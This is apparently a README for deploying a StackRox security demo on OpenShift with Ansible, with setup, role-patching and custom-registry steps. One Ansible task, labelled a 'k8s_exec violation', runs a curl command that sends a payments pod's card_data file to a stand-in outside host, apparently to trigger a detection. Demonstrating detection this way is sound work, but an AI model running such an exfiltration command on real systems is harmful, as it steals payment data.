Stackrox Demo
Deploy central
TODO
Deploy demo
Create secrets.yaml and review it.
cp ansible/group_vars/all/secrets.yaml.sample ansible/group_vars/all/secrets.yaml
Install the pre-requisites.
ansible-galaxy collection install kubernetes.core
sudo dnf install python3-openshift
Patch the existing roles.
echo -n > ansible/roles/ocp4_workload_stackrox_demo_apps/tasks/pre_workload.yml
echo -n > ansible/roles/ocp4_workload_stackrox_demo_pipeline/tasks/pre_workload.yml
Edit roles/ocp4_workload_stackrox_demo_apps/tasks/deploy_demos.yml
and modify accordingly.
- name: k8s_exec violation
kubernetes.core.k8s_exec:
namespace: payments
pod: "{{ r_processor_pod.resources[0].metadata.name }}"
command: 'curl -X POST --data-binary @/var/lib/processor/card_data http://innocent.site.web'
ignore_errors: yes
Deploy the demo.
cd ansible
export K8S_AUTH_VERIFY_SSL=false
export K8S_AUTH_KUBECONFIG="$KUBECONFIG"
ansible-playbook install.yaml
With a custom registry
./mirror.sh
oc apply -f icsp.yaml
podman login registry.itix.xyz
base64 -w0 ${XDG_RUNTIME_DIR}/containers/auth.json > /tmp/auth.b64
echo "ocp4_workload_stackrox_demo_apps_pull_secret: $(cat /tmp/auth.b64)" >> ansible/group_vars/all/secrets.yaml